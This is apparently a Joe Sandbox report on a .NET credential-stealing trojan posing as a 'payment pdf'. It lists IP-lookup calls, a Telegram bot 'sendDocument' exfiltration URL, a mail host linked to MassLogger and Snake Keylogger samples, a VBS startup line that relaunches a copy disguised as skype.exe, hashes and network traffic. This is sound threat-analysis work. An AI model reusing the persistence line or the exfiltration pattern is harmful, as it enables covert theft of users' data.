http://checkip.dyndns.org/q	PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000285B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000027C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
217.144.107.148	mail.mzgold.ir	Iran (ISLAMIC Republic Of)	204213	NETMIHANIR	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1630712
Start date and time:	2025-03-06 07:55:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PI 00928292828.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 95% Number of executed functions: 216 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.190.160.67, 13.107.246.76, 20.199.58.43, 2.23.227.221, 20.223.35.26
Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PI 00928292828.exe, PID 7340 because it is empty
Execution Graph export aborted for target skype.exe, PID 7600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:56:25	API Interceptor	38x Sleep call for process: PI 00928292828.exe modified
01:56:36	API Interceptor	36x Sleep call for process: skype.exe modified
06:56:17	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	ORDER-000291-XLSX.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	Quotation_Order_Request_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	CACUuGJw8e.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	loveme123ru.ru/PipeAuthmultiwordpress.php
	Udeladelsers21.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tumbetgirislinki.fit/7tw6/
	http://onedrivesharedfiles.sbs/	Get hash	malicious	DarkCloud	Browse	onedrivesharedfiles.sbs/
	PAYMENT SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	gH68ux6XtG.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	PO from tpc Type 34.1 34,2 35 Spec 1.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	SHIPMENT OF THE ORIGINAL DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	www.sv3880.vip/zhdz/
217.144.107.148	90939298323.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse
	Confirmarea comenzii.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse
	dxyRszHRRzGOBP9.exe	Get hash	malicious	MassLogger RAT	Browse
	btDlsPXETF.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse
	9mtmrAIfttanX0f.exe	Get hash	malicious	MassLogger RAT	Browse
	z68t9UmEqkuOVhNW4A.exe	Get hash	malicious	MassLogger RAT	Browse
	udWc6ViKhw2srJx.exe	Get hash	malicious	MassLogger RAT	Browse
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z1Estadodecuentadelcliente.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	Purchase-New Order PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FACTURAS PENDIENTES.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	HBL ASNLRU-20241001 & 20241002.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.CrypterX-gen.12725.19686.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.CrypterX-gen.15930.15097.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	Verger Doc.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	akXjj2a58b.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SVT638HOPD-HWYCTUI-PLSZT7393NG-2WDUPD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	z10JQP9VEXkuSZ7SOT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Win32.SpywareX-gen.1111.20173.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	Order 32389.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	z1Estadodecuentadelcliente.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	SOA_TONG WOH ENTERPRISE SDN BHD.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	30241696_001.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	doc2024PO20122024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	rRessourcestyrings.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
mail.mzgold.ir	90939298323.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	217.144.107.148
	Confirmarea comenzii.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse	217.144.107.148
	dxyRszHRRzGOBP9.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	btDlsPXETF.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse	217.144.107.148
	9mtmrAIfttanX0f.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	z68t9UmEqkuOVhNW4A.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	udWc6ViKhw2srJx.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
reallyfreegeoip.org	z10JQP9VEXkuSZ7SOT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	SecuriteInfo.com.Win32.SpywareX-gen.1111.20173.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	Order 32389.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	z1Estadodecuentadelcliente.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	SOA_TONG WOH ENTERPRISE SDN BHD.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	30241696_001.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	doc2024PO20122024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.96.1
	rRessourcestyrings.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	z10JQP9VEXkuSZ7SOT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Win32.SpywareX-gen.1111.20173.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	nabmpsl.elf	Get hash	malicious	Unknown	Browse	147.154.170.22
	nklspc.elf	Get hash	malicious	Unknown	Browse	140.238.15.187
	jklx86.elf	Get hash	malicious	Unknown	Browse	140.238.50.61
	nabm68k.elf	Get hash	malicious	Unknown	Browse	152.67.144.162
	Order 32389.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	z1Estadodecuentadelcliente.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	doc2024PO20122024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
NETMIHANIR	90939298323.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	217.144.107.148
	Confirmarea comenzii.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse	217.144.107.148
	kzTq7Bt.exe	Get hash	malicious	Unknown	Browse	89.42.208.212
	dxyRszHRRzGOBP9.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	btDlsPXETF.exe	Get hash	malicious	DarkTortilla, MassLogger RAT	Browse	217.144.107.148
	9mtmrAIfttanX0f.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	z68t9UmEqkuOVhNW4A.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	udWc6ViKhw2srJx.exe	Get hash	malicious	MassLogger RAT	Browse	217.144.107.148
	Delivery_Notification_00000875664.doc.js	Get hash	malicious	Unknown	Browse	217.144.106.196
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	217.144.107.148
CLOUDFLARENETUS	1isequal9.i486.elf	Get hash	malicious	Unknown	Browse	198.41.197.97
	Latsco com_DocuSign_399333177498313234326931502391571054649119654915079225oZtxEvcddgRXCDTmTgDN.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	Real.zip	Get hash	malicious	Unknown	Browse	104.16.123.96
	Korea Customs Document.html	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	miri.hazan_Wednesday, March 05, 2025.pdf	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.17.25.14
	z10JQP9VEXkuSZ7SOT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	RU YI SONG V94 PARTICULARS.pdf.bat.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z10JQP9VEXkuSZ7SOT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	https://rea.grupolalegion.ec/Viber.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	SecuriteInfo.com.Win32.SpywareX-gen.1111.20173.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	Order 32389.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	z1Estadodecuentadelcliente.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	SOA_TONG WOH ENTERPRISE SDN BHD.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	30241696_001.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	doc2024PO20122024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1

Process:	C:\Users\user\Desktop\PI 00928292828.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.74188274496351
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5SVA0uHn:FER/lFHIwknaZ5mQ
MD5:	3BFBC2DD94966C3DDC79C71849D32EF4
SHA1:	9FF703B79FB318317E5FA05BDEDFA1DB45279CD3
SHA-256:	F504902BF16C7E0B7712D233D04CBD82EA9A0F59E7D0D56D9A7769353B5777EC
SHA-512:	B2ECFF6366903D46B91BD8E25C3BA7EEE42993430AA2977D26622F9E33CFFD969D148F4DE93F1648484C3BABA36B222E7CD49094C96AF55816783C175248028A
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\skype.exe"""

C:\Users\user\AppData\Roaming\skype.exe

Download File

Process:	C:\Users\user\Desktop\PI 00928292828.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1224704
Entropy (8bit):	7.837495276018082
Encrypted:	false
SSDEEP:	24576:QfRQ5rWBn7RfiAOguddqww2xHK4P5A3+W/mal3CZ8o2pjUzKPV4t:yRErY75nkdowwsHBPu3+W/F9b4KPVG
MD5:	026760FB65D01ED810DD5195EB848499
SHA1:	786327727862A62043C979761B749A55818ABB3C
SHA-256:	C294F4EA03DBBC49BDBEC757D718AC1F7CD8015E197EC956416A07DEBAC69EC9
SHA-512:	DD7A264A19AED8CDBEDA04A94C841574C6FCD78999232350714003710471D7A493DF115698CA75004A70066FF456B3539A171CCF9A6655753E0F694A4C136518
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............`.................................@...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H.......\...............\...................................................(......0.......... ........8........E....s.......L...2...8n.....\|......(...+ ....~....{....:....& ....8......(....}.... ........8.......}.... ....~....{....9....& ....8x.....\|....(......0..{....... ........8........E....+.......,...8&.....(.... ....~....{....9....& ....8.....(....o...... ....~....{....:....& ....8.....&~..........~......0..7.........(....}.......}.......}......\|......(...+..\|...

C:\Users\user\AppData\Roaming\skype.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PI 00928292828.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.837495276018082
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PI 00928292828.exe
File size:	1'224'704 bytes
MD5:	026760fb65d01ed810dd5195eb848499
SHA1:	786327727862a62043c979761b749a55818abb3c
SHA256:	c294f4ea03dbbc49bdbec757d718ac1f7cd8015e197ec956416a07debac69ec9
SHA512:	dd7a264a19aed8cdbeda04a94c841574c6fcd78999232350714003710471d7a493df115698ca75004a70066ff456b3539a171ccf9a6655753e0f694a4c136518
SSDEEP:	24576:QfRQ5rWBn7RfiAOguddqww2xHK4P5A3+W/mal3CZ8o2pjUzKPV4t:yRErY75nkdowwsHBPu3+W/F9b4KPVG
TLSH:	8445F117B6CB8AF1C2645B36C7EB850047B4F682E663C71E7D8A136A4D133AED891307
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x52c58e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C8D786 [Wed Mar 5 23:00:22 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12c540	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12e000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x130000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x12a594	0x12a600	fc2d0cca1dda53c3b6a2758360ea18fb	False	0.9122509295140343	data	7.842058230136115	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12e000	0x5b8	0x600	401ac1238131bf7b31cc01b358ceb992	False	0.4192708333333333	data	4.103917596062929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x130000	0xc	0x200	6d94f48268ac08be324c5e06653116db	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x12e0a0	0x32c	data			0.4187192118226601
RT_MANIFEST	0x12e3cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	payment pdf
FileVersion	1.0.0.0
InternalName	payment pdf.exe
LegalCopyright	Copyright 2024
LegalTrademarks
OriginalFilename	payment pdf.exe
ProductName	payment pdf
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-06T07:56:18.203364+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	158.101.44.242	80	TCP
2025-03-06T07:56:26.265870+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	158.101.44.242	80	TCP
2025-03-06T07:56:29.406485+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	158.101.44.242	80	TCP
2025-03-06T07:56:37.312734+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	158.101.44.242	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 6, 2025 07:56:14.256861925 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:14.262026072 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:14.262101889 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:14.262352943 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:14.267410994 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:15.842248917 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:15.847105980 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:15.852432966 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:18.152323961 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:18.162405968 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:18.162465096 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:18.162539005 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:18.170861006 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:18.170881033 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:18.203363895 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:20.135416985 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.135560036 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:20.142591953 CET	49734	443	192.168.2.4	104.21.112.1
